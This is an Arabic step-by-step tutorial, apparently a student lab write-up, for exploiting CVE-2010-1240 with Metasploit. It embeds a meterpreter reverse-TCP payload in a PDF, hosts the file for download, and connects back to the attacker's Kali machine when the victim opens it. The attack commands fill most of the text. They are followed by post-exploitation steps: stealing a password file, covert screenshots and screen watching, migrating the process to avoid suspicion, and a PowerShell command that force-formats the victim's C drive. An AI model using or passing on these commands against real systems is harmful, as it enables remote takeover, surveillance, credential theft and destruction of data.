
يوضح هذا الفيديو التوضيحي كيف يمكننا التحكم في جهاز الضحية عن طريق إرسال ملف PDF يبدو غير ضار إلى الهدف، بينما يحتوي في الواقع على حمولة مدمجة. تم الكشف عن هذا الاستغلال علنًا باسم CVE-2010-1240.
مقدَّم لكم من
يوضح هذا الفيديو التوضيحي كيف يمكننا التحكم في جهاز الضحية عن طريق إرسال ملف PDF يبدو بريئًا إلى الهدف، بينما يحتوي في الواقع على حمولة مدمجة (payload). وقد نُشر الاستغلال علنًا تحت المعرف CVE-2010-1240.
بمجرد فتح ملف PDF في Adobe Reader، فإن المستخدمين الذين نخدعهم للموافقة على النوافذ الأمنية المنبثقة سيسمحون لنا بالحصول على جلسة meterpreter متصلة بأجهزتهم عبر اتصال TCP عكسي. ومنذ تلك اللحظة، تكون جميع بياناتهم وكل ما يفعلونه في الوقت الحالي تحت مراقبتنا.

أولًا، نُطلق MSFconsole التي توفر لنا واجهة سطر أوامر للوصول إلى إطار عمل Metasploit.
msfconsole
بعد ذلك، نبحث عن الاستغلال المطابق لمنصة Windows الهدف وبرنامج Adobe PDF Reader، حيث سيعرض قائمة كاملة بالاستغلالات التي يمكن استخدامها لاختراق جهاز Windows الخاص بالضحية واستغلال ثغرات Adobe PDF Reader.
search type:exploit platform:windows adobe pdf
في هذا الاستغلال، نختار ونستخدم الوحدة "adobe_pdf_embedded_exe" باستخدام الأمر أدناه لتحقيق هدف السيطرة على الضحية.
use exploit/windows/fileformat/adobe_pdf_embedded_exe
يمكننا أيضًا الاطلاع على معلومات الاستغلال باستخدام الأمر "info" كما هو موضح أدناه:
info
بعد ذلك، نضبط الحمولة (payload) لاستخدام اتصال TCP عكسي. ونستخدم أيضًا Meterpreter التي توفر واجهة أوامر تفاعلية تسهّل علينا استخدام جميع أنواع الوظائف من خلال إدخال الأكواد وتنفيذها لاستكشاف جهاز الضحية.
set payload windows/meterpreter/reverse_tcp
بعد ذلك، سنضبط عنوان المضيف والمنفذ الخاصين بالاستماع. بالنسبة إلى LHOST، نحتاج إلى إدخال عنوان IP لجهاز المهاجم، وهو في هذه الحالة عنوان IP لجهاز Kali (10.0.2.4)*.
*ملاحظة جانبية
أما بالنسبة إلى LPORT، فالأمر متروك لنا لضبط رقم منفذ غير شائع الاستخدام.
# to check Kali machine’s IP address
ifconfig
set LHOST *10.0.2.4*
set LPORT 5665
بعد ذلك، سنضبط ملف الإدخال ليكون أساسًا لملف PDF باستخدام علامة INFILENAME*. ثم سنضبط اسم الملف إلى اسم يجذب اهتمام الضحية لفتح ملف PDF الخبيث.
*ملاحظة جانبية
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'
يمكننا مراجعة خياراتنا مرة أخرى قبل إدخال أمر "exploit" لتوليد الحمولة مع ملف PDF.
# Then we can show the info or options by
show info | show options
exploit
بمجرد الانتهاء من توليد ملف PDF، سننقل الملف إلى /var/www/html، وهو دليل جهاز Kali الخاص بنا لاستضافة خادم تطبيق الويب ليتمكن ضحيتنا من تنزيل ملف PDF لاحقًا.
ملاحظة:
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html
بعد ذلك، ولإعداد المستمع (listener) الخاص بنا، سنستخدم "exploit/multi/handler". مجددًا، سنضبط الحمولة وLHOST وLPORT بما يتوافق مع ما حددناه عند توليد ملف PDF الخبيث. ثم نشغّل الحمولة.
ملاحظة:
show info أو show options أمر اختياري للتشغيل.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run
في طرفية أخرى، نتحقق من حالة خادم Apache للتأكد من أنه يعمل لاستضافة ملف PDF الخاص بنا في /var/www/html ليتمكن الضحية من تنزيل الملف.
service apache2 status
# If it is inactive, start the service
service apache2 start
على جهاز Windows، افتح أي متصفح مثل Chrome واكتب عنوان IP الخاص بـ Kali (10.0.2.4)* للوصول إلى خادم تطبيق الويب الخاص بجهاز Kali.
*ملاحظة:* يرجى ملاحظة عنوان IP لجهاز Kali الخاص بك
بعد ذلك، حاكِ مستخدمًا يحفظ ملف PDF المقصود.
بمجرد فتح الضحية للملف في Adobe Reader 8.1.2 وقبولها رسائل الأمان المنبثقة، يمكننا حينها ملاحظة وجود جلسة جديدة متصلة عبر اتصال TCP عكسي على جهاز Kali.
في سيناريو واقعي، سنقوم بإعداد موقع ويب يحتوي على ملف PDF المدمج بالحمولة ليتمكن الضحية من تنزيل الملف أو إرفاقه عبر البريد الإلكتروني.
بعد ذلك، يمكننا الوصول عن بُعد إلى جهاز الضحية وتنفيذ المزيد من السلوكيات الخبيثة التي نرغب بها داخل جلسة meterpreter.
help
pwd
ls
على سبيل المثال، إذا وُجد ملف باسم password.txt، يمكننا إصدار الأمر download password.txt
download [folder name | filename with extension]
بالطبع، يمكننا كتابة سكربت خبيث (زرع باب خلفي) لإبقاء اتصالنا بجهاز Windows إذا كنا أشرارًا حقًا! 💀
# Boot command prompt at background
execute -f cmd.exe -H -i
# Create file on Windows
echo "You have been hacked" > hack.txt
#open the txt file we have just created
hack.txt
# Take screenshot
screenshot
# Watch the remote user in real time
screenshare
ومع ذلك، يمكن للمهاجم تقليل الشكوك عن طريق ترحيل عملية meterpreter إلى عملية أخرى باستخدام وحدة migrate في جلسة meterpreter.
meterpreter> run post/windows/manage/migrate
هنا، سينشئ تلقائيًا عملية جديدة في جهاز الضحية ليرحّل نفسه إليها. وعندها يمكن للضحية حذف ملف PDF المصاب دون أن تدري إطلاقًا أن العملية قد انتقلت بالفعل إلى مكان آخر.
يمكن للمهاجم أيضًا إنشاء سكربت خبيث على الجهاز الهدف باستخدام موجه الأوامر (cmd) أو PowerShell، وهو قادر على تعطيل نظام التشغيل بالكامل ومنعه من العمل بشكل سليم.
meterpreter> shell
# Start the Windows PowerShell
powershell
#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false